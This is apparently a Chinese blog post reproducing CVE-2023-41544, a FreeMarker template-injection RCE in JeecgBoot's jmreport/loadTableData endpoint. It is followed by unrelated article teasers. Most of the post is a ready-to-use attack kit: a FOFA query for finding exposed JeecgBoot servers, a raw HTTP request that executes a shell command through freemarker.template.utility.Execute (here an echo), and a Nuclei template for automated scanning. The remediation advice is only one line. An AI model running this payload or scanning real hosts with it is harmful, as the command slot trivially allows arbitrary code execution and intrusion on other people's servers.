JeecgBoot jmreport/loadTableData RCE漏洞复现(CVE-2023-41544)

news2025/2/3 3:34:16

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发! JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!一系列低代码能力:Online表单、Online报表、Online图表、表单设计、流程设计、报表设计、大屏设计 等等。

Jeecg Boot jmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。

Ⅱ、fofa语句

title=="JeecgBoot 企业级低代码平台" || body="window._CONFIG['imgDomainURL'] = 'http://localhost:8080/jeecg-boot/" || title="Jeecg-Boot 企业级快速开发平台" || title="Jeecg 快速开发平台" || body="'http://fileview.jeecg.com/onlinePreview'" || title=="JeecgBoot 企业级低代码平台" || title=="Jeecg-Boot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title="Jeecg 快速开发平台" || title="Jeecg-Boot 快速开发平台" || body="积木报表" || body="jmreport"

Ⅲ、漏洞复现

POC

POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
Connection: close
 
{"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"echo 8888888888\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}

1、构建poc

Ⅳ、Nuclei-POC

id: JeecgBoot-loadTableData-RCE

info:
  name: Jeecg Boot jmreport/loadTableData接口存在FreeMarker SSTI注入漏洞 攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息
  author: WLF
  severity: high
  metadata: 
    fofa-query: title=="JeecgBoot 企业级低代码平台" || body="window._CONFIG['imgDomainURL'] = 'http://localhost:8080/jeecg-boot/" || title="Jeecg-Boot 企业级快速开发平台" || title="Jeecg 快速开发平台" || body="'http://fileview.jeecg.com/onlinePreview'" || title=="JeecgBoot 企业级低代码平台" || title=="Jeecg-Boot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title="Jeecg 快速开发平台" || title="Jeecg-Boot 快速开发平台" || body="积木报表" || body="jmreport"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
        Accept: application/json, text/plain, */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/json;charset=UTF-8
        Connection: close
        
        {"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"echo 8888888888\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"8888888888")

Ⅴ、修复建议

升级至安全版本

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1427598.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

虫情监测设备能够自动识别病虫害

虫情监测设备能够自动识别病虫害

TH-CQ3S虫情监测设备的工作原理主要是通过高清摄像头拍摄农田的实时图像&#xff0c;利用图像识别技术对图像中的病虫害进行自动识别。一旦发现病虫害&#xff0c;设备会自动发出警报&#xff0c;并通过手机APP通知农民。农民可以根据设备提供的预测预报&#xff0c;及时采取防…
阅读更多...
API攻击是什么?如何做好防范

API攻击是什么?如何做好防范

API 攻击是针对应用程序接口的一种攻击手段&#xff0c;近年来逐渐成为网络安全领域的热点话题。攻击者主要针对应用程序接口中的漏洞或者错误进行API攻击&#xff0c;从而达到窃取敏感数据、进行恶意操作、破坏系统正常运行等恶意目的。 什么是API攻击&#xff1f; API 攻击是…
阅读更多...
window 安装 jenkins 编写脚本

window 安装 jenkins 编写脚本

set JAVA_HOMED:\RuanJianKaiFa\jdk\jdk11 set CLASSPATH.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOMe%\lib\tools.jar; set Path%JAVA_HOME%\bin; java -jar jenkins.war 下载jenkins.war包&#xff0c;编写一个txt文档&#xff0c;把脚本复制进去&#xff0c;修改文件后缀为.bat文件…
阅读更多...
【MySQL】MySQL库

【MySQL】MySQL库

使用C/C语言链接MySQL 一、mysql connect二、mysql 接口介绍1. 初始化 mysql_init()2. 链接数据库 mysql_real_connect()3. 执行 mysql 命令 mysql_query()4. 获取执行结果 mysql_store_result()5. 释放空间5. 关闭 mysql 链接 mysql_close() 一、mysql connect 要使用C语言连…
阅读更多...
【JavaEE进阶】 图书管理系统开发日记——贰

【JavaEE进阶】 图书管理系统开发日记——贰

文章目录 &#x1f332;前言&#x1f384;设计数据库&#x1f343;引⼊MyBatis和MySQL驱动依赖&#x1f333;Model创建&#x1f38d;约定前后端交互接口&#x1f340;服务器代码&#x1f6a9;控制层&#x1f6a9;业务层&#x1f6a9;数据层 &#x1f334;效果展示⭕总结 &#…
阅读更多...
亚马逊速卖通shein测评补单,轻松获得高评店铺订单暴涨人气火爆

亚马逊速卖通shein测评补单,轻松获得高评店铺订单暴涨人气火爆

测评之所以被认为是最快速有效的推广方式&#xff0c;是因为它能够迅速影响多个关键因素。通过测评&#xff0c;您能够快速提升关键词的转化率&#xff0c;从而获得更好的搜索排名。优质的评价有助于增加产品的权重和转化率&#xff0c;进一步提升排名。同时&#xff0c;增加的…
阅读更多...
whistle抓包时如何过滤掉无用的链接

whistle抓包时如何过滤掉无用的链接

whistle在抓包的时候经常会有一些图片等我们不需要的地址&#xff0c;过多时会影响到我们抓的接口的速度&#xff0c;如何能快速的过滤掉无用的链接呢 可以在setting下进行如下设置 Exclude Filter&#xff1a;排除筛选器&#xff0c;即勾选后会排除勾选框下的地址链接Includ…
阅读更多...
重写Sylar基于协程的服务器(3、协程模块的设计)

重写Sylar基于协程的服务器(3、协程模块的设计)

重写Sylar基于协程的服务器&#xff08;3、协程模块的设计&#xff09; 重写Sylar基于协程的服务器系列&#xff1a; 重写Sylar基于协程的服务器&#xff08;0、搭建开发环境以及项目框架 || 下载编译简化版Sylar&#xff09; 重写Sylar基于协程的服务器&#xff08;1、日志模…
阅读更多...
千卡训练有效时间占比超过95%,蚂蚁集团AI Infra技术开源

千卡训练有效时间占比超过95%,蚂蚁集团AI Infra技术开源

近日&#xff0c;蚂蚁集团AI创新研发部门NextEvo全面开源AI Infra技术&#xff0c;可帮助大模型千卡训练有效时间占比超过95%&#xff0c;能实现训练时“自动驾驶”&#xff0c;这推动了AI研发效率。 &#xff08;图&#xff1a;蚂蚁集团的自动化分布式深度学习系统DLRover现已…
阅读更多...
7+双样本孟德尔随机化“得分神器”的双向孟德尔果然名不虚传

7+双样本孟德尔随机化“得分神器”的双向孟德尔果然名不虚传

今天给同学们分享一篇生信文章“Bidirectional Mendelian randomization analysis of the genetic association between primary lung cancer and colorectal cancer”&#xff0c;这篇文章发表在J Transl Med期刊上&#xff0c;影响因子为7.4。 结果解读&#xff1a; MR分析结…
阅读更多...
【开源】基于JAVA+Vue+SpringBoot的智慧家政系统

【开源】基于JAVA+Vue+SpringBoot的智慧家政系统

目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块三、系统展示四、核心代码4.1 查询家政服务4.2 新增单条服务订单4.3 新增留言反馈4.4 小程序登录4.5 小程序数据展示 五、免责说明 一、摘要 1.1 项目介绍 基于微信小程序JAVAVueSpringBootMySQL的智慧家政系统&#xff0…
阅读更多...
Jmeter学习系列之五:基础线程组(Thread Group)

Jmeter学习系列之五:基础线程组(Thread Group)

前言 线程组是一系列线程的集合,每一个线程代表着一个正在使用应用程序的用户。在 jmeter 中,每个线程意味着模拟一个真实用户向服务器发起请求。 在 jmeter 中,线程组组件运行用户设置线程数量、初始化方式等等配置。 例如,如果你设置线程数为 100,那么 jmeter 将创建…
阅读更多...
【前端模板】bootstrap5实现蓝色数码网站BigTech(电商适用,附带源码)

【前端模板】bootstrap5实现蓝色数码网站BigTech(电商适用,附带源码)

一、需求分析 数码电商网站是指专门销售数码产品的在线商城。它们提供了一个平台&#xff0c;供消费者浏览、选择和购买各种数码产品&#xff0c;如智能手机、电脑、相机、家电等。这些网站通常提供以下功能&#xff1a; 产品展示&#xff1a;数码电商网站展示各种数码产品的详…
阅读更多...
现货白银交易k线图发生突破时如何入场?

现货白银交易k线图发生突破时如何入场?

在分析现货白银交易K线图的时候&#xff0c;我们经常会碰到突破这种行情。突破是一种强烈的具有指向性和预期性的行情&#xff0c;但同时它也是一个潜在交易风险较大的行情。碰到突破之后&#xff0c;现货白银投资者应该如何入场呢&#xff1f;下面我们就来讨论一下。 突破发生…
阅读更多...
量化学习5(量化回测)

量化学习5(量化回测)

1 pandas计算策略评估指标 本章节介绍关于金融量化分析的一些基本概念&#xff0c;如年华收益率、基准年化收益率、最大回撤等。在严格的量化策略回测中&#xff0c;这些概念都是需要掌握并熟练使用的&#xff0c;这样能够全面的评估量化策略。市面上&#xff0c;很多策略回测…
阅读更多...
C++游戏开发的优势

C++游戏开发的优势

C作为一种高效的编程语言&#xff0c;在游戏开发领域有着独特的优势。通过充分利用C的特性&#xff0c;游戏开发人员可以实现更高的性能、可移植性和灵活性。下面简单的介绍C游戏开发的优势&#xff0c;并探讨它在游戏开发中的应用。 性能优势 游戏是对计算机系统资源要求很高…
阅读更多...
深入理解指针(2)

深入理解指针(2)

⽬录 1. 字符指针变量 2. 数组指针变量 3. ⼆维数组传参的本质 4. 函数指针变量 5. 函数指针数组 6. 转移表 1. 字符指针变量 在指针的类型中我们知道有⼀种指针类型为字符指针 char* ; ⼀般使⽤: int main() {char ch w;char *pc &ch;*pc w;return 0; } 还有…
阅读更多...
雨云游戏云VPS服务器用Linux搭建MCSM面板和Minecraft Mohist 1.20.2服务器教程,我的世界MOD和插件服开服教程。

雨云游戏云VPS服务器用Linux搭建MCSM面板和Minecraft Mohist 1.20.2服务器教程,我的世界MOD和插件服开服教程。

雨云游戏云VPS服务器用Linux搭建MCSM面板和Minecraft Mohist 1.20.2服务器教程&#xff0c;我的世界MOD和插件服开服教程。 本教程演示安装的MC服是Mohist 1.20.2版&#xff0c;其他版本也可以参考本教程&#xff0c;差别不大。 本教程使用Docker来运行mc服&#xff0c;可以方…
阅读更多...
51单片机编程应用(C语言):模块化编程

51单片机编程应用(C语言):模块化编程

下面我们模块化几个函数&#xff1a; Delay.c //延时子函数 void Delay(unsigned int xms) {unsigned char i, j;while(xms--){i 2;j 239;do{while (--j);} while (--i);} } Delay.h #ifndef __DELAY_H__ #define __DELAY_H__void Delay(unsigned int xms);#endifNixie.h …
阅读更多...
ElasticSearch搜索与分析引擎-Linux离线环境安装教程

ElasticSearch搜索与分析引擎-Linux离线环境安装教程

目录 一、下载安装包 网盘链接: 二、安装流程及遇到的问题和解决方案 &#xff08;1&#xff09;JDK安装 &#xff08;2&#xff09;Elasticsearch安装 &#xff08;3&#xff09;Kibana安装 ​&#xff08;4&#xff09;Ik分词器安装 三、启动过程中的问题 &#xff…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023